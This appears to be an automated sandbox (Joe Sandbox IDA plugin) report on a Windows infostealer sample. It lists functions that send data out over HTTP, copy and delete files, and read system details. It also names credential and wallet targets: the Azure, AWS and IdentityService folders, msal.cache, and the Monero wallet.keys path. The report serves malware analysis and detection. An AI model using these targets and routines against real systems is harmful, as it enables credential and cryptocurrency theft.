lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,013BE528,00000000,?,013B5EF8,00000000,?,017FF22C,00000000,?,017F1976), ref: 017E540B
lstrlen.KERNEL32(00000000), ref: 017E541F
GetProcessHeap.KERNEL32(00000000,?), ref: 017E5430
RtlAllocateHeap.NTDLL(00000000), ref: 017E5437
lstrlen.KERNEL32(00000000), ref: 017E544C
memcpy.MSVCRT ref: 017E5463
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 017E547D
memcpy.MSVCRT ref: 017E548A
lstrlen.KERNEL32(00000000), ref: 017E549C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 017E54B5
memcpy.MSVCRT ref: 017E54C5
lstrlen.KERNEL32(00000000,?,?), ref: 017E54E2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 017E54F6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 017E5521
InternetCloseHandle.WININET(00000000), ref: 017E5585
InternetCloseHandle.WININET(00000000), ref: 017E5592
InternetCloseHandle.WININET(00000000), ref: 017E559C

Strings

--, xrefs: 017E4F54
", xrefs: 017E5156
------, xrefs: 017E51CD
------, xrefs: 017E530F
------, xrefs: 017E4F6B
------, xrefs: 017E508B
", xrefs: 017E5298
", xrefs: 017E53DA

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1133489818-2774362122
Opcode ID: 4e3d5f137cb86f73ce99298e4aef7c33937e246517a8ec9185cee657c0033f22
Instruction ID: fea6e1ee1a29a9eb181e72374425f3d541c62bc9a129e00bc05743ad794b43c1
Opcode Fuzzy Hash: 4e3d5f137cb86f73ce99298e4aef7c33937e246517a8ec9185cee657c0033f22
Instruction Fuzzy Hash: 4C32E076920119AADF15EFA0DC98FEFF378BF64700F00419DA20662695DF306A49CF66

Function 017E5630 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E4490: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 017E4516
Part of subcall function 017E4490: InternetCrackUrlA.WININET(00000000,00000000), ref: 017E4526

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 017E56C8
StrCmpCA.SHLWAPI(?,013BE608), ref: 017E56E3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 017E5863
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,013BE4B8,00000000,?,013B5EF8,00000000,?,017FF26C), ref: 017E5B3E
lstrlen.KERNEL32(00000000), ref: 017E5B4F
GetProcessHeap.KERNEL32(00000000,?), ref: 017E5B60
HeapAlloc.KERNEL32(00000000), ref: 017E5B67
lstrlen.KERNEL32(00000000), ref: 017E5B7C
memcpy.MSVCRT ref: 017E5B93
lstrlen.KERNEL32(00000000), ref: 017E5BA5
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 017E5BBE
memcpy.MSVCRT ref: 017E5BCB
lstrlen.KERNEL32(00000000,?,?), ref: 017E5BE8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 017E5BFC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 017E5C19
InternetCloseHandle.WININET(00000000), ref: 017E5C7D
InternetCloseHandle.WININET(00000000), ref: 017E5C8A
HttpOpenRequestA.WININET(00000000,013BE648,?,013C2018,00000000,00000000,00400100,00000000), ref: 017E58C8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

InternetCloseHandle.WININET(00000000), ref: 017E5C94

Strings

", xrefs: 017E59A5
", xrefs: 017E5AE6
------, xrefs: 017E58DB
------, xrefs: 017E5766
------, xrefs: 017E5A1C

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 148854478-2180234286
Opcode ID: 2eadfc0414e9981225c31fb49cac4c6455fc07309d3ef6aa9cee72272e0e5cc1
Instruction ID: b09c7521185ff622db8fca97eeee12b5bea487e1f7716e38eea39d3b4dbf1c6a
Opcode Fuzzy Hash: 2eadfc0414e9981225c31fb49cac4c6455fc07309d3ef6aa9cee72272e0e5cc1
Instruction Fuzzy Hash: DC12C076960119AACF15EBA0DC98FDFF378BF24700F00419DA20662695DF706A49CF66

Function 017EA050 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F8890: StrCmpCA.SHLWAPI(00000000,017FECC0,017EC922,017FECC0,00000000), ref: 017F88AF

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 017EA382
RtlAllocateHeap.NTDLL(00000000), ref: 017EA389
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 017EA16A

Part of subcall function 017F8640: lstrlen.KERNEL32(00000000,?,?,017F3D93,017FE4BB,017FE4BA,?,?,017F4A46,00000000,?,013B09B8,?,017FE988,?,00000000), ref: 017F864B
Part of subcall function 017F8640: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F86A5

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

lstrcat.KERNEL32(?,00000000), ref: 017EA4CA
lstrcat.KERNEL32(?,017FEB70), ref: 017EA4D9
lstrcat.KERNEL32(?,00000000), ref: 017EA4EC
lstrcat.KERNEL32(?,017FEB74), ref: 017EA4FB
lstrcat.KERNEL32(?,00000000), ref: 017EA50E
lstrcat.KERNEL32(?,017FEB78), ref: 017EA51D
lstrcat.KERNEL32(?,00000000), ref: 017EA530
lstrcat.KERNEL32(?,017FEB7C), ref: 017EA53F
lstrcat.KERNEL32(?,00000000), ref: 017EA552
lstrcat.KERNEL32(?,017FEB80), ref: 017EA561
lstrcat.KERNEL32(?,00000000), ref: 017EA574
lstrcat.KERNEL32(?,017FEB84), ref: 017EA583

Part of subcall function 017E9800: memcmp.MSVCRT ref: 017E981B
Part of subcall function 017E9800: memset.MSVCRT ref: 017E984E
Part of subcall function 017E9800: LocalAlloc.KERNEL32(00000040,?), ref: 017E989E

lstrcat.KERNEL32(?,00000000), ref: 017EA5CC
lstrcat.KERNEL32(?,017FEB88), ref: 017EA5E6
lstrlen.KERNEL32(?), ref: 017EA625
lstrlen.KERNEL32(?), ref: 017EA634
memset.MSVCRT ref: 017EA67D

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

DeleteFileA.KERNEL32(00000000), ref: 017EA6A9

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: af71dc447e6b62ca6e3afae6e54be415d9326b06fe37f5df6b82c79b674b153a
Instruction ID: ee6ac460bfdd6a115caee182fb1fb76032caf48a8dfef7d11264c605445fd751
Opcode Fuzzy Hash: af71dc447e6b62ca6e3afae6e54be415d9326b06fe37f5df6b82c79b674b153a
Instruction Fuzzy Hash: EF020075950109ABCF15EFA0DD99EEFF378AF24301F10415CE206A6298EF34AE05CB66

Function 017EC670 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F6A70: GetSystemTime.KERNEL32(?,013B5F88,017FE129,?,?,?,?,?,?,?,?,?,017E4643,?,00000014), ref: 017F6A96

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 017EC703
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 017EC847
RtlAllocateHeap.NTDLL(00000000), ref: 017EC84E
lstrcat.KERNEL32(?,00000000), ref: 017EC988
lstrcat.KERNEL32(?,017FECC8), ref: 017EC997
lstrcat.KERNEL32(?,00000000), ref: 017EC9AA
lstrcat.KERNEL32(?,017FECCC), ref: 017EC9B9
lstrcat.KERNEL32(?,00000000), ref: 017EC9CC
lstrcat.KERNEL32(?,017FECD0), ref: 017EC9DB
lstrcat.KERNEL32(?,00000000), ref: 017EC9EE
lstrcat.KERNEL32(?,017FECD4), ref: 017EC9FD
lstrcat.KERNEL32(?,00000000), ref: 017ECA10
lstrcat.KERNEL32(?,017FECD8), ref: 017ECA1F
lstrcat.KERNEL32(?,00000000), ref: 017ECA32
lstrcat.KERNEL32(?,017FECDC), ref: 017ECA41
lstrcat.KERNEL32(?,00000000), ref: 017ECA54
lstrcat.KERNEL32(?,017FECE0), ref: 017ECA63

Part of subcall function 017F8640: lstrlen.KERNEL32(00000000,?,?,017F3D93,017FE4BB,017FE4BA,?,?,017F4A46,00000000,?,013B09B8,?,017FE988,?,00000000), ref: 017F864B
Part of subcall function 017F8640: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F86A5

lstrlen.KERNEL32(?), ref: 017ECAAA
lstrlen.KERNEL32(?), ref: 017ECAB9
memset.MSVCRT ref: 017ECB02

Part of subcall function 017F8890: StrCmpCA.SHLWAPI(00000000,017FECC0,017EC922,017FECC0,00000000), ref: 017F88AF

DeleteFileA.KERNEL32(00000000), ref: 017ECB2E

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 8fdffa9b0dc399ae321c31fa231d56f21ccaac9c25ca4573f939d19592a57a1e
Instruction ID: 4e04458b558062fe57b8921daa4a8d03f6c0a0a0de9a7e1040a4bb37a5145cd6
Opcode Fuzzy Hash: 8fdffa9b0dc399ae321c31fa231d56f21ccaac9c25ca4573f939d19592a57a1e
Instruction Fuzzy Hash: BEE11F75950109ABCF15EFA0DD99EEFB378AF24301F10415CE206A6298EF356A09CF66

Function 017F3970 Relevance: 28.6, APIs: 10, Strings: 9, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 017F3987

Part of subcall function 017F6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 017F6D1B

lstrcat.KERNEL32(?,00000000), ref: 017F39B0
lstrcat.KERNEL32(?,\.azure\), ref: 017F39CD

Part of subcall function 017F3560: wsprintfA.USER32 ref: 017F3579
Part of subcall function 017F3560: FindFirstFileA.KERNEL32(?,?), ref: 017F3590

memset.MSVCRT ref: 017F3A0D
lstrcat.KERNEL32(?,00000000), ref: 017F3A36
lstrcat.KERNEL32(?,\.aws\), ref: 017F3A53

Part of subcall function 017F3560: StrCmpCA.SHLWAPI(?,017FE8C4), ref: 017F35BE
Part of subcall function 017F3560: StrCmpCA.SHLWAPI(?,017FE8C8), ref: 017F35D4
Part of subcall function 017F3560: FindNextFileA.KERNEL32(000000FF,?), ref: 017F37A9
Part of subcall function 017F3560: FindClose.KERNEL32(000000FF), ref: 017F37BE

memset.MSVCRT ref: 017F3A93
lstrcat.KERNEL32(?,00000000), ref: 017F3ABC
lstrcat.KERNEL32(?,\.IdentityService\), ref: 017F3AD9

Part of subcall function 017F3560: wsprintfA.USER32 ref: 017F35FA
Part of subcall function 017F3560: StrCmpCA.SHLWAPI(?,017FE497), ref: 017F360C
Part of subcall function 017F3560: wsprintfA.USER32 ref: 017F3629
Part of subcall function 017F3560: PathMatchSpecA.SHLWAPI(?,?), ref: 017F365F
Part of subcall function 017F3560: lstrcat.KERNEL32(?,013BE558), ref: 017F368B
Part of subcall function 017F3560: lstrcat.KERNEL32(?,017FE8E0), ref: 017F369D
Part of subcall function 017F3560: lstrcat.KERNEL32(?,?), ref: 017F36AE
Part of subcall function 017F3560: lstrcat.KERNEL32(?,017FE8E4), ref: 017F36C0
Part of subcall function 017F3560: lstrcat.KERNEL32(?,?), ref: 017F36D4
Part of subcall function 017F3560: CopyFileA.KERNEL32(?,?,00000001), ref: 017F36EA
Part of subcall function 017F3560: DeleteFileA.KERNEL32(?), ref: 017F3769

memset.MSVCRT ref: 017F3B19

Strings

Azure\.aws, xrefs: 017F3A59
*.*, xrefs: 017F3A5E
*.*, xrefs: 017F39D8
msal.cache, xrefs: 017F3AE4
\.IdentityService\, xrefs: 017F3ACD
\.azure\, xrefs: 017F39C1
Azure\.azure, xrefs: 017F39D3
\.aws\, xrefs: 017F3A47
Azure\.IdentityService, xrefs: 017F3ADF

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-974132213
Opcode ID: 7ea8ffa8ea81ba7889355accc1f3a4e7a24e024b346bf1c1d9d7139d780bdfc6
Instruction ID: aa90f82530c92981e399e47613bf90fc3c54e3f0be77ce96e891ea2b1449e5d7
Opcode Fuzzy Hash: 7ea8ffa8ea81ba7889355accc1f3a4e7a24e024b346bf1c1d9d7139d780bdfc6
Instruction Fuzzy Hash: 2D4185B598021967CB10FBB0DC5EFDFB7789B24714F00449CB74A56144EEB09799CBA2

Function 017F61F0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

RegOpenKeyExA.KERNEL32(00000000,013BE438,00000000,00020019,00000000,017FE146), ref: 017F6274
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 017F62F6
wsprintfA.USER32 ref: 017F6329
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 017F634B
RegCloseKey.ADVAPI32(00000000), ref: 017F635C
RegCloseKey.ADVAPI32(00000000), ref: 017F6369

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Strings

%s\%s, xrefs: 017F631D
?, xrefs: 017F624A
- , xrefs: 017F6473

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: afd318d6ca8f81ed62c1054d4c338f55528f581afa2809507c4ef518a4e8f977
Instruction ID: 10324ae84ec1a38e6c59e09d98cba586edbac0ac952a4c5abe7a96cac951c069
Opcode Fuzzy Hash: afd318d6ca8f81ed62c1054d4c338f55528f581afa2809507c4ef518a4e8f977
Instruction Fuzzy Hash: BE8109759101199BDF25DF54CC98FEAB7B8BF18700F0082DDA209A6244DF74AB89CFA1

Function 017E12D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 017E12E7

Part of subcall function 017E1260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 017E1274
Part of subcall function 017E1260: HeapAlloc.KERNEL32(00000000), ref: 017E127B
Part of subcall function 017E1260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 017E1297
Part of subcall function 017E1260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 017E12B5
Part of subcall function 017E1260: RegCloseKey.ADVAPI32(?), ref: 017E12BF

lstrcat.KERNEL32(?,00000000), ref: 017E130F
lstrlen.KERNEL32(?), ref: 017E131C
lstrcat.KERNEL32(?,.keys), ref: 017E1337

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F6A70: GetSystemTime.KERNEL32(?,013B5F88,017FE129,?,?,?,?,?,?,?,?,?,017E4643,?,00000014), ref: 017F6A96

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

CopyFileA.KERNEL32(?,00000000,00000001), ref: 017E1425

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 017E93EC
Part of subcall function 017E93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 017E9411
Part of subcall function 017E93C0: LocalAlloc.KERNEL32(00000040,?), ref: 017E9431
Part of subcall function 017E93C0: ReadFile.KERNEL32(000000FF,?,00000000,017EF9B7,00000000), ref: 017E945A
Part of subcall function 017E93C0: LocalFree.KERNEL32(017EF9B7), ref: 017E9490
Part of subcall function 017E93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 017E949A

DeleteFileA.KERNEL32(00000000), ref: 017E14A9
memset.MSVCRT ref: 017E14D0

Part of subcall function 017E4DE0: lstrlen.KERNEL32(00000000), ref: 017E4E6A
Part of subcall function 017E4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 017E4EDB
Part of subcall function 017E4DE0: StrCmpCA.SHLWAPI(?,013BE608), ref: 017E4EF9

Strings

wallet_path, xrefs: 017E12F0
.keys, xrefs: 017E132B
\Monero\wallet.keys, xrefs: 017E134D
SOFTWARE\monero-project\monero-core, xrefs: 017E12F5

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: 5c71b7bf1a46b9e246f7f16f7a4331cb94437e9896ab8fcfea2d68144b1624b9
Instruction ID: d4462dd07af26658d969aa2b47464a3d3e410de289805b21e36e63160e76b175
Opcode Fuzzy Hash: 5c71b7bf1a46b9e246f7f16f7a4331cb94437e9896ab8fcfea2d68144b1624b9
Instruction Fuzzy Hash: 745103B19501199BCF15FB60DD99EEEB37C9F64300F4041DCA70A62185EF706B898F66

Function 017F5430 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 017F5472
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 017F54AF
GetProcessHeap.KERNEL32(00000000,00000104), ref: 017F5533
HeapAlloc.KERNEL32(00000000), ref: 017F553A
wsprintfA.USER32 ref: 017F5570

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Strings

:, xrefs: 017F548C
\, xrefs: 017F5490
C, xrefs: 017F547C

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 046a0da006a5feb42769cfbec129ed83ec8664b4e732c2caeba64187964230c2
Instruction ID: 2c04344497e4eaac2df901d295416c8d2d51b06904d20f2e52eb3687d19c0ec1
Opcode Fuzzy Hash: 046a0da006a5feb42769cfbec129ed83ec8664b4e732c2caeba64187964230c2
Instruction Fuzzy Hash: 5F4171B1D00258ABDF11DB94DC48BDEBBB5EF08714F14409CF609A7384D774AA85CBA5

Function 017F5FD0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013C0938,00000000,?,017FE7D4,00000000,?,00000000), ref: 017F6000
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,013C0938,00000000,?,017FE7D4,00000000,?,00000000,00000000), ref: 017F6007
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 017F6028
__aulldiv.LIBCMT ref: 017F6042
__aulldiv.LIBCMT ref: 017F6050
wsprintfA.USER32 ref: 017F607C

Strings

%d MB, xrefs: 017F6073
@, xrefs: 017F601D

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 76f00774b6274eebff311bf2da455e764f91057521a30dea03d758d7f926010d
Instruction ID: ac0475f434473d82cf6cf677909488509eb9220084ae3be1e7cb9d6122656a27
Opcode Fuzzy Hash: 76f00774b6274eebff311bf2da455e764f91057521a30dea03d758d7f926010d
Instruction Fuzzy Hash: E12127B1E40209ABDB10DFD5CC49FAFB7B8EB48B14F10420DF705AB284C779A9018BA4

Function 017E5D60 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E4490: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 017E4516
Part of subcall function 017E4490: InternetCrackUrlA.WININET(00000000,00000000), ref: 017E4526

InternetOpenA.WININET(017FE7CE,00000001,00000000,00000000,00000000), ref: 017E5DCF
